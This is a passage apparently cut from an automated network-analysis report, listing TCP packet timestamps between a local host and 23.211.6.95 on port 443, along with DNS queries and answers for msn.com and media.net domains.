                                                                                                                                                                                                                  Dec 3, 2021 00:42:58.386915922 CET4434980123.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:42:58.390280962 CET49801443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:42:58.390295982 CET4434980123.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:42:58.390819073 CET49800443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:42:58.390836000 CET4434980023.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:42:58.412730932 CET4434980123.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:42:58.412805080 CET4434980123.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:42:58.412837982 CET49801443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:42:58.412858963 CET49801443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:42:58.430516958 CET49802443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:42:58.430546045 CET4434980223.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:42:58.940596104 CET49800443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:42:58.940653086 CET4434980023.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:42:58.944211006 CET49804443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:42:58.944257975 CET4434980423.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:42:58.944329023 CET49803443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:42:58.944371939 CET49804443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:42:58.944386005 CET4434980323.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:42:58.944545031 CET49803443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:42:58.945787907 CET49804443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:42:58.945816040 CET4434980423.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:42:58.946355104 CET49803443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:42:58.946388006 CET4434980323.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:42:58.971497059 CET4434980023.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:42:58.971587896 CET49800443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:42:58.971613884 CET4434980023.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:42:58.971626997 CET4434980023.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:42:58.971697092 CET49800443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:42:58.987802029 CET4434980423.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:42:58.987910032 CET49804443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:42:58.990380049 CET4434980323.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:42:58.990499020 CET49803443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:42:59.358918905 CET49804443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:42:59.358953953 CET4434980423.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:42:59.359282017 CET4434980423.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:42:59.359374046 CET49804443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:42:59.360543013 CET49803443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:42:59.360579014 CET4434980323.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:42:59.360824108 CET4434980323.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:42:59.360901117 CET49803443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:42:59.362216949 CET49804443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:42:59.362273932 CET4434980423.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:42:59.398442984 CET4434980423.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:42:59.398566008 CET4434980423.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:42:59.398595095 CET49804443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:42:59.398659945 CET49804443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:42:59.510607958 CET49804443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:42:59.510647058 CET4434980423.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:06.319808006 CET49806443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:06.319869995 CET4434980623.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:06.320492029 CET49806443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:06.419785023 CET49803443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:06.419924021 CET4434980323.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:06.421294928 CET49806443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:06.421315908 CET4434980623.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:06.455157995 CET4434980323.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:06.455236912 CET49803443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:06.455259085 CET4434980323.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:06.455286980 CET4434980323.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:06.455348015 CET49803443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:06.455367088 CET49803443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:06.458687067 CET4434980623.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:06.458849907 CET49806443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:06.554809093 CET49803443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:06.554841042 CET4434980323.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:06.555811882 CET49791443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:06.555850029 CET49791443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:06.935281038 CET49806443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:06.949661970 CET49807443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:06.949683905 CET4434980723.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:06.949770927 CET49807443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:06.949924946 CET49808443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:06.949933052 CET4434980823.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:06.950006962 CET49808443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:06.959434986 CET49809443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:06.959484100 CET4434980923.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:06.959583998 CET49809443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:06.976874113 CET4434980623.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.078722000 CET49806443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.078739882 CET4434980623.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.085784912 CET49807443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.085798979 CET4434980723.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.085908890 CET49808443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.085920095 CET4434980823.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.086144924 CET49809443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.086179972 CET4434980923.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.116779089 CET4434980623.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.116940975 CET49806443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.116955996 CET4434980623.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.117037058 CET49806443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.118284941 CET4434980623.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.118293047 CET4434980623.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.118319988 CET4434980623.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.118423939 CET49806443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.118436098 CET4434980623.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.118447065 CET49806443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.118587971 CET49806443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.123775959 CET4434980723.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.123845100 CET49807443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.126648903 CET4434980923.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.126760960 CET49809443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.127834082 CET4434980823.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.127898932 CET49808443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.134263039 CET4434980623.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.134399891 CET49806443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.134418011 CET4434980623.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.134471893 CET49806443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.138756037 CET4434980623.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.138825893 CET4434980623.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.138864994 CET49806443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.138883114 CET4434980623.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.138899088 CET49806443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.138933897 CET49806443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.138951063 CET4434980623.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.139041901 CET49806443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.200891972 CET49808443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.200912952 CET4434980823.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.203701973 CET49809443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.203718901 CET4434980923.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.211735010 CET49807443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.216392994 CET49806443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.216424942 CET4434980623.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.217717886 CET49808443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.217732906 CET4434980823.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.217885971 CET49809443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.217907906 CET4434980923.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.236332893 CET4434980823.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.236411095 CET49808443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.236423016 CET4434980823.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.236474991 CET49808443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.236566067 CET4434980823.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.236608028 CET4434980823.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.236608982 CET49808443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.236646891 CET49808443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.236824989 CET49808443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.236835957 CET4434980823.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.240107059 CET4434980923.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.240145922 CET4434980923.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.240258932 CET49809443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.240287066 CET4434980923.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.240396023 CET49809443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.242250919 CET4434980923.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.242273092 CET4434980923.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.242346048 CET4434980923.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.242347002 CET49809443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.242376089 CET4434980923.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.242419958 CET49809443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.242439032 CET49809443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.252868891 CET4434980723.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.258296967 CET4434980923.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.258446932 CET49809443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.258471012 CET4434980923.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.258527994 CET49809443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.262809038 CET4434980923.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.262854099 CET4434980923.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.262923002 CET49809443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.262948990 CET4434980923.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.262969971 CET49809443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.263000011 CET49809443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.265352964 CET4434980923.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.265446901 CET49809443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.265467882 CET4434980923.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.265515089 CET49809443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.275325060 CET4434980923.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.275369883 CET4434980923.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.275429010 CET49809443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.275453091 CET4434980923.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.275470018 CET49809443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.275499105 CET49809443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.277751923 CET4434980923.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.277863026 CET49809443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.277883053 CET4434980923.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.277950048 CET49809443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.281749964 CET4434980923.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.281855106 CET4434980923.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.281872034 CET49809443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.281883955 CET4434980923.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.281933069 CET49809443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.281951904 CET49809443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.328161001 CET49809443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:07.328190088 CET4434980923.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.200273037 CET49821443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.200329065 CET4434982123.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.200547934 CET49821443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.201411009 CET49821443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.201436996 CET4434982123.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.243933916 CET4434982123.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.244040966 CET49821443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.307148933 CET49807443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.307183027 CET4434980723.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.327342987 CET4434980723.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.327472925 CET49807443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.327491999 CET4434980723.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.327528000 CET4434980723.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.327569008 CET49807443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.327589989 CET49807443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.599494934 CET49821443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.599549055 CET4434982123.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.599807024 CET49807443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.599838972 CET4434980723.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.602514029 CET49821443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.602533102 CET4434982123.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.630428076 CET4434982123.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.630456924 CET4434982123.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.630578995 CET49821443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.630594969 CET4434982123.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.630650997 CET49821443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.632689953 CET4434982123.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.632704973 CET4434982123.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.632757902 CET4434982123.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.632860899 CET49821443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.632872105 CET4434982123.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.632942915 CET49821443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.650504112 CET4434982123.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.650595903 CET49821443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.650609970 CET4434982123.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.650676966 CET49821443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.655474901 CET4434982123.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.655509949 CET4434982123.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.655582905 CET49821443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.655597925 CET4434982123.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.655649900 CET49821443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.658339024 CET4434982123.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.658441067 CET49821443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.658483982 CET4434982123.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.658531904 CET49821443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.670108080 CET4434982123.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.670141935 CET4434982123.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.670192003 CET49821443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.670233965 CET4434982123.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.670249939 CET49821443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.670278072 CET49821443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.672446012 CET4434982123.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.672535896 CET49821443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.672552109 CET4434982123.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.672626019 CET49821443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.677156925 CET4434982123.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.677228928 CET4434982123.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.677251101 CET4434982123.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.677277088 CET49821443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.677361012 CET49821443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.730477095 CET49821443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:08.730511904 CET4434982123.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:09.615696907 CET49793443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:09.615731001 CET4434979323.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:24.778460979 CET49798443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:24.778496027 CET4434979823.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:24.959595919 CET49801443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:24.959628105 CET4434980123.211.6.95192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:43:25.434403896 CET49800443192.168.2.623.211.6.95
                                                                                                                                                                                                                  Dec 3, 2021 00:43:25.434448957 CET4434980023.211.6.95192.168.2.6

                                                                                                                                                                                                                  UDP Packets

                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                  Dec 3, 2021 00:42:21.275201082 CET5602353192.168.2.68.8.8.8
                                                                                                                                                                                                                  Dec 3, 2021 00:42:33.538043976 CET5606153192.168.2.68.8.8.8
                                                                                                                                                                                                                  Dec 3, 2021 00:42:35.619294882 CET5833653192.168.2.68.8.8.8
                                                                                                                                                                                                                  Dec 3, 2021 00:42:35.640818119 CET53583368.8.8.8192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:42:50.708467960 CET5281153192.168.2.68.8.8.8
                                                                                                                                                                                                                  Dec 3, 2021 00:42:50.730206966 CET53528118.8.8.8192.168.2.6
                                                                                                                                                                                                                  Dec 3, 2021 00:42:51.324790955 CET5529953192.168.2.68.8.8.8
                                                                                                                                                                                                                  Dec 3, 2021 00:42:58.394412041 CET6374553192.168.2.68.8.8.8
                                                                                                                                                                                                                  Dec 3, 2021 00:42:58.413429022 CET53637458.8.8.8192.168.2.6

                                                                                                                                                                                                                  DNS Queries

                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                                  Dec 3, 2021 00:42:21.275201082 CET192.168.2.68.8.8.80xd648Standard query (0)www.msn.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                  Dec 3, 2021 00:42:33.538043976 CET192.168.2.68.8.8.80x2dbStandard query (0)browser.events.data.msn.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                  Dec 3, 2021 00:42:35.619294882 CET192.168.2.68.8.8.80x2ef0Standard query (0)contextual.media.netA (IP address)IN (0x0001)
                                                                                                                                                                                                                  Dec 3, 2021 00:42:50.708467960 CET192.168.2.68.8.8.80x5c77Standard query (0)lg3.media.netA (IP address)IN (0x0001)
                                                                                                                                                                                                                  Dec 3, 2021 00:42:51.324790955 CET192.168.2.68.8.8.80xd2ecStandard query (0)assets.msn.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                  Dec 3, 2021 00:42:58.394412041 CET192.168.2.68.8.8.80x257eStandard query (0)hblg.media.netA (IP address)IN (0x0001)

                                                                                                                                                                                                                  DNS Answers

                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                                  Dec 3, 2021 00:42:21.295094967 CET8.8.8.8192.168.2.60xd648No error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                  Dec 3, 2021 00:42:33.559954882 CET8.8.8.8192.168.2.60x2dbNo error (0)browser.events.data.msn.comglobal.asimov.events.data.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                  Dec 3, 2021 00:42:35.640818119 CET8.8.8.8192.168.2.60x2ef0No error (0)contextual.media.net23.211.6.95A (IP address)IN (0x0001)
                                                                                                                                                                                                                  Dec 3, 2021 00:42:50.730206966 CET8.8.8.8192.168.2.60x5c77No error (0)lg3.media.net23.211.6.95A (IP address)IN (0x0001)
